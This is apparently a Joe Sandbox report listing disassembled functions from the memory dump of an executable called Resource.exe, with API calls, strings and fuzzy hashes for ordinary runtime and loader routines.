Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: Message$ErrorLast$ByteCharFormatMultiWide
String ID: %s%s: %s$Fatal error detected
API String ID: 2806210788-2410924014
Opcode ID: c01ac0bbfceecfac493be67ae1d6a2211250b6a817a0c50f994bc812b65e1c92
Instruction ID: c7a02c68a5086f03a932bf2d7a3f74d070ca6d76faf3c09c9c8dece56d81aa26
Opcode Fuzzy Hash: c01ac0bbfceecfac493be67ae1d6a2211250b6a817a0c50f994bc812b65e1c92
Instruction Fuzzy Hash: 2B31A37363869281E630DB10E5507EA6364FF847C4F404136EA8D87A99DF3ED305CB49

Function 00007FF6E60BA018 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6E60BA03D
GetProcAddress.KERNEL32 ref: 00007FF6E60BA053
FreeLibrary.KERNEL32 ref: 00007FF6E60BA07A

Strings

mscoree.dll, xrefs: 00007FF6E60BA034
CorExitProcess, xrefs: 00007FF6E60BA04C

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: bbe3d75c1d18d9b252fc65a249d413b32bc9fbcf71b4c61f8ce4d80949566840
Instruction ID: 8cbe82cc40824a616eab7e24fb4be16bf533432ba98039b032c78b454c61bc15
Opcode Fuzzy Hash: bbe3d75c1d18d9b252fc65a249d413b32bc9fbcf71b4c61f8ce4d80949566840
Instruction Fuzzy Hash: 7EF06262A3971282FB108B24E5483795360EF48761F640335CA6E8A1F4CF3FE484C75A

Function 00007FF6E60C9C40 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6E60C9C68
_set_statfp.LIBCMT ref: 00007FF6E60C9C83
_set_statfp.LIBCMT ref: 00007FF6E60C9C9F
_set_statfp.LIBCMT ref: 00007FF6E60C9CDB

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
Instruction ID: f40bfc571d0ea7eeaeb2cc5c959172ce09b715c7121c2bf6291d51a318435e3f
Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
Instruction Fuzzy Hash: E2115E73E3CA2301F6541168EB9637914806F99374E080A34E96F9E7DACE2FA840422E

Function 00007FF6E60BB950 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF6E60BAB67,?,?,00000000,00007FF6E60BAE02,?,?,?,?,?,00007FF6E60B30CC), ref: 00007FF6E60BB96F
FlsSetValue.KERNEL32(?,?,?,00007FF6E60BAB67,?,?,00000000,00007FF6E60BAE02,?,?,?,?,?,00007FF6E60B30CC), ref: 00007FF6E60BB98E
FlsSetValue.KERNEL32(?,?,?,00007FF6E60BAB67,?,?,00000000,00007FF6E60BAE02,?,?,?,?,?,00007FF6E60B30CC), ref: 00007FF6E60BB9B6
FlsSetValue.KERNEL32(?,?,?,00007FF6E60BAB67,?,?,00000000,00007FF6E60BAE02,?,?,?,?,?,00007FF6E60B30CC), ref: 00007FF6E60BB9C7
FlsSetValue.KERNEL32(?,?,?,00007FF6E60BAB67,?,?,00000000,00007FF6E60BAE02,?,?,?,?,?,00007FF6E60B30CC), ref: 00007FF6E60BB9D8

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: d801a28a554c769664efa354ebfd0b80a1c2cf055cf85cf1a4ca3ea16c8f16bf
Instruction ID: 42b3f00f249ab922aa01e7321dfcc66015e15eb72fd03adbfe9b4b0f656a2962
Opcode Fuzzy Hash: d801a28a554c769664efa354ebfd0b80a1c2cf055cf85cf1a4ca3ea16c8f16bf
Instruction Fuzzy Hash: 6B117F22B2826242FA589726A7513796141AF547B0F04D334E97DC67CEDF2FF441860B

Function 00007FF6E60BB7E4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF6E60BB7F5
FlsSetValue.KERNEL32 ref: 00007FF6E60BB814
FlsSetValue.KERNEL32 ref: 00007FF6E60BB83C
FlsSetValue.KERNEL32 ref: 00007FF6E60BB84D
FlsSetValue.KERNEL32 ref: 00007FF6E60BB85E

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 36aa701cef3ea20dd7a69930769d7f1501d8ca7b86b81db8ef8c0888a69bdcaf
Instruction ID: a0bff487ceb23b48d1b7ae40af0340c1b7417ad0874fb5562c068c528014bf6f
Opcode Fuzzy Hash: 36aa701cef3ea20dd7a69930769d7f1501d8ca7b86b81db8ef8c0888a69bdcaf
Instruction Fuzzy Hash: BA112722E2922747F96867315B1537A22819F44370E58DB38D93ECA2DBDE6FB401860F

Function 00007FF6E60B64B4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B64F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B661A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B66D0

Strings

verbose, xrefs: 00007FF6E60B64C4

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
Instruction ID: fbcbba0c8cc8450d6faa9ce5a0da6526a5a75965ed9b2ae7eac7a526535b2d2f
Opcode Fuzzy Hash: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
Instruction Fuzzy Hash: C891AE33A38E6685E7218A25D65037D37A0AB40B58F448136DA5E873DDDE3FE845830A

Function 00007FF6E60C05A8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C0887

Part of subcall function 00007FF6E60C69C4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C69E1

Strings

UTF-8, xrefs: 00007FF6E60C0806
ccs, xrefs: 00007FF6E60C07C2
UTF-16LEUNICODE, xrefs: 00007FF6E60C0825

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 1a54e2a2b62d6839c513ace75884cea9e48035532f3c44be9a18c4b4dcf643eb
Instruction ID: 8d0cd467d598c787a33f683f6f2c55af6b392d787fe1703bc7b78d5062c31d92
Opcode Fuzzy Hash: 1a54e2a2b62d6839c513ace75884cea9e48035532f3c44be9a18c4b4dcf643eb
Instruction Fuzzy Hash: 5681C633D2862285F7694F29C3103783690AB10B84F558134DA4BDF295CF2FE645EB6B

Function 00007FF6E60AEFD8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6E60AF024
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6E60AF073

Strings

RCC, xrefs: 00007FF6E60AF041
MOC, xrefs: 00007FF6E60AF038

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 37ce56c1d967fba8f41503b71a699ba51a6fbc199d8f022e66d4a2d7a57293db
Instruction ID: 2e50b9a4492f2c018d0ce77a3adc43220840155ce2ce4947e5e6ed3f73dae56d
Opcode Fuzzy Hash: 37ce56c1d967fba8f41503b71a699ba51a6fbc199d8f022e66d4a2d7a57293db
Instruction Fuzzy Hash: A4619933A28B558AE7208F65D5803AD7BA0FB48BC8F045225EF4D57B99DF3AE084C705

Function 00007FF6E60AF334 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6E60AF35C
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF6E60AF444

Strings

csm, xrefs: 00007FF6E60AF37E
csm, xrefs: 00007FF6E60AF496

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 80d5d2ed719ea387a00afc8e5c38e85421d4b0de11d669121429011e6c75d481
Instruction ID: edcf54eaf652b9bb6f68b3d29d21221330ac8ae9be726b28f4a41d8f028298b8
Opcode Fuzzy Hash: 80d5d2ed719ea387a00afc8e5c38e85421d4b0de11d669121429011e6c75d481
Instruction Fuzzy Hash: 8751AF3392829286EB648F21924436977A1EB44BC4F149235DB9DC7BD5CF3FE490CB0A

Function 00007FF6E60A2890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6E60A8AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E60A2ABB), ref: 00007FF6E60A8B1A

MessageBoxW.USER32 ref: 00007FF6E60A299B
MessageBoxA.USER32 ref: 00007FF6E60A29B7

Strings

%s%s: %s, xrefs: 00007FF6E60A2916
Fatal error detected, xrefs: 00007FF6E60A2971, 00007FF6E60A29A9

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: %s%s: %s$Fatal error detected
API String ID: 1878133881-2410924014
Opcode ID: e8e3c511841a02337865787422672dc7088828a74b651abb3bad42d47e8d3758
Instruction ID: 8220134a26a84c945a4bffe7af3c91baee5d6cc086ea81d2e26b4d58fdbff238
Opcode Fuzzy Hash: e8e3c511841a02337865787422672dc7088828a74b651abb3bad42d47e8d3758
Instruction Fuzzy Hash: 4531A67363869181E630EB10E5517EA6364FF847C4F804036E68D87A99DF3ED305CB49

Function 00007FF6E60A3EC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,00007FF6E60A39EA), ref: 00007FF6E60A3EF1

Part of subcall function 00007FF6E60A29E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E60A87F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6E60A101D), ref: 00007FF6E60A2A14
Part of subcall function 00007FF6E60A29E0: MessageBoxW.USER32 ref: 00007FF6E60A2AF0

Strings

Failed to get executable path., xrefs: 00007FF6E60A3EFB
Failed to convert executable path to UTF-8., xrefs: 00007FF6E60A3F2A
GetModuleFileNameW, xrefs: 00007FF6E60A3F02

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: ErrorFileLastMessageModuleName
String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
API String ID: 2581892565-1977442011
Opcode ID: 227eff0bc0a0d80c8f8e7ebb06cca3199172163df290dc8daf9e61b6ec9130a6
Instruction ID: e05d1e4739908cc18ce0397d885a73af555ce0db2f2ad4c39d6b5a98f8ca49ca
Opcode Fuzzy Hash: 227eff0bc0a0d80c8f8e7ebb06cca3199172163df290dc8daf9e61b6ec9130a6
Instruction Fuzzy Hash: 4401DF73B3D7A281FA649720EA153B51260AF187C4F840436E84ECA692EE1FE105871A

Function 00007FF6E60BCB60 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF6E60BCBDF
WriteFile.KERNEL32 ref: 00007FF6E60BCEA7
WriteFile.KERNEL32 ref: 00007FF6E60BCEED
GetLastError.KERNEL32 ref: 00007FF6E60BCFA3

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 9513e67bca3e1584d4e6c680d6c879e0cc2bad3dff94493eb0c92e1d92f8606a
Instruction ID: 6838a61f534636dc254b4683f33ca2cbcb1f1f0b3a65400cfa5f95ab94e2b142
Opcode Fuzzy Hash: 9513e67bca3e1584d4e6c680d6c879e0cc2bad3dff94493eb0c92e1d92f8606a
Instruction Fuzzy Hash: A4D11273B28A9189E750CF75D6402AC37B1FB54BD8B148236DE5E97B89DE3AD406C308

Function 00007FF6E60B5854 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF6E60B5887
GetFileInformationByHandle.KERNEL32 ref: 00007FF6E60B58E9
GetLastError.KERNEL32 ref: 00007FF6E60B597A
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,?,00007FF6E60B578C), ref: 00007FF6E60B59C6

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 76a0635d5597b22ce5d2941ff6046abd28e8f163941117926f9164ef5776c06c
Instruction ID: 33c677f7025c2a31be59b1d04d1bb4766c21048fb1d3d62c49fc354d2b1d2aa2
Opcode Fuzzy Hash: 76a0635d5597b22ce5d2941ff6046abd28e8f163941117926f9164ef5776c06c
Instruction Fuzzy Hash: E851A263A287518AF711DF70D6503BD33A1EB48B98F208535DE4D8B68EDF3AD4818716

Function 00007FF6E60A2330 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6E60A2364
SetWindowLongPtrW.USER32 ref: 00007FF6E60A2386
GetWindowLongPtrW.USER32 ref: 00007FF6E60A23B0
InvalidateRect.USER32 ref: 00007FF6E60A23D0

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
Instruction ID: 4c4777d36ef8ff94eba5e2d236c1ed59374b99117d55fb7d8d975bf40823bb50
Opcode Fuzzy Hash: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
Instruction Fuzzy Hash: 4D11A933E2816243FA54976AF7443791292EF85BC0F588030DE8946B9DCE2FD4C14609

Function 00007FF6E60C628C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6E60C1DD0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C1E03

_get_daylight.LIBCMT ref: 00007FF6E60C63A4
_get_daylight.LIBCMT ref: 00007FF6E60C63B5

Strings

?, xrefs: 00007FF6E60C6335

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 17ef38b8e319b62c4683ba5c2bd00e0c19603a4e78082bfdfdcdf9d98f8fed33
Instruction ID: 5945bfb2ae93e3be633497a303bd8fc37d2732395eb6e2fd038badc1bbb987b7
Opcode Fuzzy Hash: 17ef38b8e319b62c4683ba5c2bd00e0c19603a4e78082bfdfdcdf9d98f8fed33
Instruction Fuzzy Hash: 07413813A382A242FB348B25D65537A6750EF80BA4F104235EF5E8BADADE3FD441C716

Function 00007FF6E60B95A4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B95D6

Part of subcall function 00007FF6E60BAF0C: RtlFreeHeap.NTDLL(?,?,?,00007FF6E60C3392,?,?,?,00007FF6E60C33CF,?,?,00000000,00007FF6E60C3895,?,?,00000000,00007FF6E60C37C7), ref: 00007FF6E60BAF22
Part of subcall function 00007FF6E60BAF0C: GetLastError.KERNEL32(?,?,?,00007FF6E60C3392,?,?,?,00007FF6E60C33CF,?,?,00000000,00007FF6E60C3895,?,?,00000000,00007FF6E60C37C7), ref: 00007FF6E60BAF2C

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6E60ABFE5), ref: 00007FF6E60B95F4

Strings

C:\Users\user\Desktop\Resource.exe, xrefs: 00007FF6E60B95E2

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\Resource.exe
API String ID: 3580290477-180410116
Opcode ID: 72bea691884ec75b0bcc04dadd89fc5e2ba2839e886db2c4c4036b89f533388c
Instruction ID: b166d6d0dbfca1a73076ae4f56e3816fb2cd7d7c9ab86d44751dcc47dcb46f55
Opcode Fuzzy Hash: 72bea691884ec75b0bcc04dadd89fc5e2ba2839e886db2c4c4036b89f533388c
Instruction Fuzzy Hash: 93418437A28B3286EB54DF21D6402BC2794EF85784B548035E94E87B89DF3FD8918309

Function 00007FF6E60BD1F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF6E60BD30F
GetLastError.KERNEL32 ref: 00007FF6E60BD331

Strings

U, xrefs: 00007FF6E60BD2BB

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

